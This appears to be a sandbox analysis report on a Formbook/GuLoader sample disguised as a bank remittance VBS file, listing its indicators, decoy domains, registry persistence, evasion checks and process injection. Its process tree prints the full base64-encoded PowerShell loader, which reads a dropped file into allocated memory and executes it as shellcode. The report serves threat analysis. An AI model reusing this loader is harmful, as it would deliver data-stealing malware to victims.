formbook | dcc73a1351b6b79d48f7b42a96edfb142ffe46f896e1ab9f412a615b1edd7c9b

Analysis

max time kernel
150s
max time network
147s
platform
windows7_x64
resource
win7-en-20211208
submitted
24-01-2022 14:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Remittance Information (MT-103).vbs
Size

80KB
MD5

d693624e3d9614a0dc9cf5a5cd1bb8ef
SHA1

9c50c26e8b2f9c9acfa3192385df88d3144f351c
SHA256

dcc73a1351b6b79d48f7b42a96edfb142ffe46f896e1ab9f412a615b1edd7c9b
SHA512

b9bf3919fa3c105386ccb06da796d99c9f0100d24745a42989740bb1b22419f904a254b6c7542a10f90e2f7ba26dc887471f5de87d504644192abfcb7f364e17

Score

10^/10

formbook guloader k6sm downloader persistence rat spyware stealer suricata trojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

k6sm

Decoy

mingshengjewelry.com

ontimecleaningenterprise.com

alyssa0.xyz

ptecex.xyz

dukfot.online

pvcpc.com

iowalawtechnology.com

nestletranspotation.com

mysithomes.com

greenlakespaseattle.com

evofishingsystems.com

unilytcs.com

ordemt.com

dentalbatonrouge.com

pictureme360.net

chalinaslacatalana.com

newmirrorimage.xyz

pinklaceandlemonade.com

rapinantes.com

yzicpa.com

Signatures

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata

Formbook Payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/768-77-0x0000000000400000-0x000000000042F000-memory.dmp	formbook
behavioral1/memory/768-76-0x0000000000400000-0x000000000069B000-memory.dmp	formbook
behavioral1/memory/1760-84-0x0000000000080000-0x00000000000AF000-memory.dmp	formbook

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

chkdsk.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-2329389628-4064185017-3901522362-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	chkdsk.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\9RSD1NEHI = "C:\\Program Files (x86)\\internet explorer\\ieinstal.exe"	chkdsk.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeieinstal.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

chkdsk.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-2329389628-4064185017-3901522362-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	chkdsk.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

ieinstal.exe

pid process

768 ieinstal.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

472 powershell.exe
768 ieinstal.exe

pid	process
768	ieinstal.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeieinstal.exechkdsk.exe

description	pid	process	target process
PID 472 set thread context of 768	472	powershell.exe	ieinstal.exe
PID 768 set thread context of 1228	768	ieinstal.exe	Explorer.EXE
PID 768 set thread context of 1228	768	ieinstal.exe	Explorer.EXE
PID 1760 set thread context of 1228	1760	chkdsk.exe	Explorer.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

chkdsk.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier chkdsk.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	chkdsk.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

chkdsk.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-2329389628-4064185017-3901522362-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	chkdsk.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

Processes:

powershell.exeieinstal.exechkdsk.exe

pid	process
472	powershell.exe
768	ieinstal.exe
768	ieinstal.exe
768	ieinstal.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe
1760	chkdsk.exe

Suspicious behavior: MapViewOfSection 9 IoCs

Processes:

powershell.exeieinstal.exechkdsk.exe

pid process

472 powershell.exe
768 ieinstal.exe
768 ieinstal.exe
768 ieinstal.exe
768 ieinstal.exe
1760 chkdsk.exe
1760 chkdsk.exe
1760 chkdsk.exe
1760 chkdsk.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exeieinstal.exechkdsk.exe

description pid process

Token: SeDebugPrivilege 472 powershell.exe
Token: SeDebugPrivilege 768 ieinstal.exe
Token: SeDebugPrivilege 1760 chkdsk.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

Explorer.EXE

pid process

1228 Explorer.EXE
1228 Explorer.EXE
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

Explorer.EXE

pid process

1228 Explorer.EXE
1228 Explorer.EXE

description	pid	process
Token: SeDebugPrivilege	472	powershell.exe
Token: SeDebugPrivilege	768	ieinstal.exe
Token: SeDebugPrivilege	1760	chkdsk.exe

pid	process
1228	Explorer.EXE
1228	Explorer.EXE

pid	process
1228	Explorer.EXE
1228	Explorer.EXE

Suspicious use of WriteProcessMemory 29 IoCs

Processes:

WScript.exepowershell.execsc.exeExplorer.EXEchkdsk.exe

description	pid	process	target process
PID 1660 wrote to memory of 472	1660	WScript.exe	powershell.exe
PID 1660 wrote to memory of 472	1660	WScript.exe	powershell.exe
PID 1660 wrote to memory of 472	1660	WScript.exe	powershell.exe
PID 1660 wrote to memory of 472	1660	WScript.exe	powershell.exe
PID 472 wrote to memory of 1904	472	powershell.exe	csc.exe
PID 472 wrote to memory of 1904	472	powershell.exe	csc.exe
PID 472 wrote to memory of 1904	472	powershell.exe	csc.exe
PID 472 wrote to memory of 1904	472	powershell.exe	csc.exe
PID 1904 wrote to memory of 1972	1904	csc.exe	cvtres.exe
PID 1904 wrote to memory of 1972	1904	csc.exe	cvtres.exe
PID 1904 wrote to memory of 1972	1904	csc.exe	cvtres.exe
PID 1904 wrote to memory of 1972	1904	csc.exe	cvtres.exe
PID 472 wrote to memory of 768	472	powershell.exe	ieinstal.exe
PID 472 wrote to memory of 768	472	powershell.exe	ieinstal.exe
PID 472 wrote to memory of 768	472	powershell.exe	ieinstal.exe
PID 472 wrote to memory of 768	472	powershell.exe	ieinstal.exe
PID 472 wrote to memory of 768	472	powershell.exe	ieinstal.exe
PID 472 wrote to memory of 768	472	powershell.exe	ieinstal.exe
PID 472 wrote to memory of 768	472	powershell.exe	ieinstal.exe
PID 472 wrote to memory of 768	472	powershell.exe	ieinstal.exe
PID 1228 wrote to memory of 1760	1228	Explorer.EXE	chkdsk.exe
PID 1228 wrote to memory of 1760	1228	Explorer.EXE	chkdsk.exe
PID 1228 wrote to memory of 1760	1228	Explorer.EXE	chkdsk.exe
PID 1228 wrote to memory of 1760	1228	Explorer.EXE	chkdsk.exe
PID 1760 wrote to memory of 360	1760	chkdsk.exe	Firefox.exe
PID 1760 wrote to memory of 360	1760	chkdsk.exe	Firefox.exe
PID 1760 wrote to memory of 360	1760	chkdsk.exe	Firefox.exe
PID 1760 wrote to memory of 360	1760	chkdsk.exe	Firefox.exe
PID 1760 wrote to memory of 360	1760	chkdsk.exe	Firefox.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1228

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Remittance Information (MT-103).vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:1660

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAVQBuAHAAbAAgAE8AdQB0AHMAaABvADgAIABuAG8AbgBwAG8AcwAgAFQAYQBsAGUAaABtACAAUAByAG8AdABlADIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGoAbwBiAG4AYQB2AG4AIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARABSAE8ATgAiACAADQAKACQATwBmAGEAeQB2AGUAMwA9ADAAOwANAAoAJABPAGYAYQB5AHYAZQA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAE8AZgBhAHkAdgBlADgAPQBbAE8AZgBhAHkAdgBlADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgALQAxACwAWwByAGUAZgBdACQATwBmAGEAeQB2AGUAMwAsADAALABbAHIAZQBmAF0AJABPAGYAYQB5AHYAZQA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACMAYQBpAHMAaABhAGgAcwBrAGEAIAB3AGgAYQBtAHAAbABhAHYAZQAgAFMAdAB1AGQAaQA3ACAAQQBsAGwAZQBnAHIAZQA4ACAAUABhAHIAdABpAGMAdQBsAGEAcgAzACAAUwBhAHYAYQBnADMAIABhAG4AawBvAG0AcwB0AHIAIABCAFkARwBOAEkATgBHAFMAUwBOACAAUwBwAGUAZQBkAGUAIABWAGkAbgBoAHMAMgAgAFUAbgBkAGUAcgBlADgAIABFAHAAdQByAGEAbABiAGkAYQBsACAAUwBVAEIAVABFAFMAVAAgAEQAZQBnAHIAYQAgAEIAZQBtAGUAYQBuADgAIABQAFIAUwBJACAAUwBvAGwAZABhAHQAZQByAGgAagAgAFAAcgBvAHMAdABpAHQAdQB0AGkAMQAgAHUAdABuAGsAZQBsACAAQQBjAHIAZQBhAGcAZQBzADcAIABGAE8AUgBEACAAVQBOAFMATwBMAEUATQAgAE8AQwBDAFUAUABJACAAQQBDAEMATwBVAFQAIABLAFUATABUAFUAIABGAG8AcgBoAGEAaQBsAGUAOQAgAHAAbABhAHQAIAByAGUAZgBvAGMAIABLAE4AQQBTAEUATgAgAEsAbgB1AHIANwAgAFAAaQBlAGIAYQBsAGQAbAB5ADcAIABKAFUAQgBBAFIAVABBAFMAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYAYQBsAGIAeQBkAGUAbgBkACIAIAANAAoAJABPAGYAYQB5AHYAZQAyAD0AIgAkAGUAbgB2ADoAdABlAG0AcAAiACAAKwAgACIAXABDAGgAYQBtAHAAYQBnADYALgBkAGEAdAAiAA0ACgAjAGYAbABvAG8AIABtAGkAbABpAGUAdQBiAGUAcwAgAEUAbQBlAG4AZABlADkAIABnAHIAbQB1AG4AcAByAGUAZABpACAASwBFAEUAUAAgAFAAUgBFAFYAQQBSAEkAQwBBACAARQBuAGQAcwBoAGEAawBlAHUAYgA5ACAAcwBvAHIAYQBuAGUAcgAgAFMAdgBlAGwAbgBpAG4AZwBzAHQAOQAgAGoAbwByAHUAbQAgAE0ARQBEAEwARQBNAFMATABJACAAQQBmAHIAaQBrAGEAbgBpAHMAZQAxACAAQQBsAGcAYQBlAG8AbABvAGcAeQAzACAAVQBkAHIAaQB2AG4AaQBuAGcAZQAgAGoAZQBsAGwAaQBsAHkAZwBlACAAUwBLAEEATQBMAEUAUgBOAEUAIABTAEMASABVACAATgBVAEwATABJAFQAWQBTACAAUgBlAHMAdABpADYAIAANAAoAJABPAGYAYQB5AHYAZQA0AD0AWwBPAGYAYQB5AHYAZQAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQATwBmAGEAeQB2AGUAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBTAEEAUABJACAATQBlAGQAbABiAGUAcgAgAEYAcgBpAHMAcgBpAG4AZABlADYAIABSAGUAdgBpAGIAcgBhAHQAZQBkACAAUgBlAHQAdABlAHIAdAAgAFAAcgBvAHQAbwAgAEwAbwB2AG4AZAA1ACAAUwBwAHIAZQBkADUAIABSAEgAWQBUAEgAIABCAGEAcwBoAGEAdwAgAFQAaABlAG8AZwBvAG4AaQBjADgAIABpAG4AcwBvAGwAIABTAGEAbgBrADQAIABCAFUATABMAFIAVQBTAEgARQBTACAASwBlAGoAcwBlAHIAdAByAG8AbgAgAFQAdgBhAG4AZwBzAGYAagBlADIAIABDAGEAdABhAGMAYQA2ACAAbwB0AHQAZQByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBHAHIAaQBmADQAIgAgAA0ACgAkAE8AZgBhAHkAdgBlADUAPQAwADsADQAKACMAcwBhAGwAaQBjAHkAbABzAGMAIABFAG4AZABvADQAIABGAHUAbABnAHUAcgBjAGEAIABCAHUAbgBkAHMAIABPAHAAZQByAGMAdQBsAGUAMwAgAHAAZQByAG0AIABNAGUAcwBtAGUAcgBpAGMAMgAgAEEAYgBzAG8AIABLAE8ATgBUAFUAUgBUAEUAIABFAFIASwBFAE4ARABFAEwAUwBFACAAUwBVAEIARQBYAFQAIABQAHQAZQByAG8AZwByAGEAIABnAGEAcwBsAGkAZwBoAHQAZQBkACAAYgBvAHIAdABsAG8AdgBlAHIAIABhAG4AdABpACAAQwByAHUAZABsACAAdAByAGEAbgAgAEoAYQBnAHQAbABlAGoAZQBuADkAIAB3AGkAZQBuAGUAcgBzAHQAbwAgAHUAbAB5AGsAIABuAG8AdABhAHQAIABRAGEAcwBpAGQAYQBhAHoAYQB0ACAAZgBvAHQAbwBrAG8AIABGAEEARwBFAFIASABBAEwAVgBMACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBzAGgAbwByAGUAbAAiACAADQAKAFsATwBmAGEAeQB2AGUAMQBdADoAOgBSAGUAYQBkAEYAaQBsAGUAKAAkAE8AZgBhAHkAdgBlADQALAAkAE8AZgBhAHkAdgBlADMALAAyADYAMAA0ADIALABbAHIAZQBmAF0AJABPAGYAYQB5AHYAZQA1ACwAMAApAA0ACgAjAFUATgBNAEkAVABSACAAZAByAGkAbABiAG8AcgBlAG4AIABJAE4AQQBMAEkAIABpAG4AZAB0AGEAcwAgAEUAdAB5AG0AbwA4ACAAcgBlAGQAcgBlAHMAcwAgAFMAQwBZAEwAIABLAGkAbgBrAHUAbgBkADMAIABLAGUAcgBhAHQAaQBuAG8AcAAgAEwAQQBOAEcAUwBLAEcARwBFACAAcwBrAGkAbAB0AG4AaQBuAGcAZQAgAFAAUgBPAFYATwBLACAATABhAG4AZABlAHYAZQBqACAAQQBuAHMAdABpAGsAbgBpAG4AZwA1ACAAUwB1AGIAcABoAHIAZQBuAGkAYwAgAEcAbABhAHIAbQAgAE0ATwBOAE8AQwAgAEYATwBSAEIAVQBOAEQAUwBLAEEAIABNAGEAdgBlADYAIABTAHAAZABiAHIAbgBzAHAAbABlADgAIABIAGEAbgBkAGwAZQBtAGEAYQAgAFQAZQBtAHAAIABBAGQAaABhAHIAbQBhAHMANAAgAE8AVQBUAFcAUgBBAE4AIABFAGsAcwBwAGUAZABpAHQAaQAgAFUAbgBjAGEAcwB0ADkAIABqAHUAZABhAGkAcwAgAEEAbgBhAHIAawBpAHMAbQAyACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBiAHUAdABpAGsAcwBpAG4AdgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBOAEcAUwBBAEIATwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBMAGUAagBlAGwAbwB2AGUAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATgBlAGQAcgBpAGcAaABlAGQANgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAFkAUgBPAEwAVQBTAEkAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUwBhAGYAdABoAG8AbABkACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGIAaQBzAGsAdQBpACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEsAbwBsAGwAMgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAGwAbwBuAGUAbABsACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFIAQQBOAEQATwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAFUAUABPAE4ASwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBIAEUATABIAEUARABTAEwAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBSAEgAVgBFAFIAUwBUACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEkATgBEAEYAQQBOAEcATgBJAE4AIgAgAA0ACgBbAE8AZgBhAHkAdgBlADEAXQA6ADoAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKAAkAE8AZgBhAHkAdgBlADMALAAgADAALAAwACwAMAAsADAAKQANAAoADQAKAA=="
3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:472

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uyl7_mum.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1904

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE1A9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE198.tmp"
5⤵
PID:1972

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:768

C:\Windows\SysWOW64\chkdsk.exe
"C:\Windows\SysWOW64\chkdsk.exe"
2⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1760

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:360

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Champag6.dat
MD5
e6c81d4cd250cd041f12f926ae2c4a57

SHA1
619f23b7e24d5337c3003a2d0f831483d30981ca

SHA256
0ec7eb748af7b6b2337468c11aae5061b5cde0ff89472539b970ad57d739350a

SHA512
fe4324a5eb37a19a905d9d3c2a3bea1f0356b924ff69ff4cfb70769a5ea10ec482eac753e6f895835783c43bce38a46c2494b9795dedf1dedec0ee1f1103b23f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE1A9.tmp
MD5
9a4c61ce968ded8207e8e7bcb4a9959e

SHA1
1e089169b963a8ee47f98fe90c74d2cf9cf3e2bd

SHA256
17d76b7a1364564f53ff51f8c6c20eff885967a42e0cb9d45683032988759742

SHA512
ef82814e5462afb7f879c732b4fb97ff7dab2b4a8d914527e89ff52a918c9e7e6e955001bdc666afe8315d94b2dbf9dfe368a0a119e51fad124e0632bd5e9302

Download Submit
C:\Users\Admin\AppData\Local\Temp\uyl7_mum.dll
MD5
9658b5188cbe72d16f088ae0b7eef4f9

SHA1
3c80e21dae8647189440bc599651e29b4fb76740

SHA256
6331ff8ead58cc89efb215757b972fbee99794147e4db5b09b9301764c02b92e

SHA512
e53de520a5494ee7a4fe2db896ce0e2408ee05c2c1be853bb42d7aa33af9d915da5410a6eb21b79a40e2a2f58c73bf724033ca1913e1854efcae44fb2fdc2372

Download Submit
C:\Users\Admin\AppData\Local\Temp\uyl7_mum.pdb
MD5
2c810b2f173f0ee171d23040554d71b4

SHA1
2f0301258119d01a3d94ba9c2b963387582e4fc0

SHA256
4a2279d0e32e4e25c8d01f673f5423952aede3ca448f4edd03132484f3c78d0f

SHA512
66ddd8a7fa4d15a7dad9605d234447d98b357652071b73c83d5d1d78094b4b74db35d04574360bdabec6eac8ce7b54045f3d1631678d2981d2cbf10b225cad44

Download Submit
C:\Users\Admin\AppData\Roaming\7-O4R1-6\7-Ologim.jpeg
MD5
ff47908737d7ee11f181640cf070167a

SHA1
abe0c903debc5d78316bf71aef96e051cdad039f

SHA256
0d89a651790ef7f02761b693da03443181d3b8eaf13215fe0855edf355da511e

SHA512
2a4c295ef90119d917ef9293313b545345fd6c7a25e0ea271ff1365e7d48593ae01b07e6548e2a64629f8ff89c9b1b32a148c801fdca63652af0f05baf808653

Download Submit
C:\Users\Admin\AppData\Roaming\7-O4R1-6\7-Ologrf.ini
MD5
2f245469795b865bdd1b956c23d7893d

SHA1
6ad80b974d3808f5a20ea1e766c7d2f88b9e5895

SHA256
1662d01a2d47b875a34fc7a8cd92e78cb2ba7f34023c7fd2639cbb10b8d94361

SHA512
909f189846a5d2db208a5eb2e7cb3042c0f164caf437e2b1b6de608c0a70e4f3510b81b85753dbeec1e211e6a83e6ea8c96aff896e9b6e8ed42014473a54dc4f

Download Submit
C:\Users\Admin\AppData\Roaming\7-O4R1-6\7-Ologri.ini
MD5
d63a82e5d81e02e399090af26db0b9cb

SHA1
91d0014c8f54743bba141fd60c9d963f869d76c9

SHA256
eaece2eba6310253249603033c744dd5914089b0bb26bde6685ec9813611baae

SHA512
38afb05016d8f3c69d246321573997aaac8a51c34e61749a02bf5e8b2b56b94d9544d65801511044e1495906a86dc2100f2e20ff4fcbed09e01904cc780fdbad

Download Submit
C:\Users\Admin\AppData\Roaming\7-O4R1-6\7-Ologrv.ini
MD5
ba3b6bc807d4f76794c4b81b09bb9ba5

SHA1
24cb89501f0212ff3095ecc0aba97dd563718fb1

SHA256
6eebf968962745b2e9de2ca969af7c424916d4e3fe3cc0bb9b3d414abfce9507

SHA512
ecd07e601fc9e3cfc39addd7bd6f3d7f7ff3253afb40bf536e9eaac5a4c243e5ec40fbfd7b216cb0ea29f2517419601e335e33ba19dea4a46f65e38694d465bf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCE198.tmp
MD5
3dbf384377066ba72527d38ddac6a494

SHA1
8a332d36e13c5222feb31fd41bbee8cf681f7169

SHA256
4b3e80d7320d61db6e48abeff8e31c8b81dff1cc8839534257c7f87923c2c412

SHA512
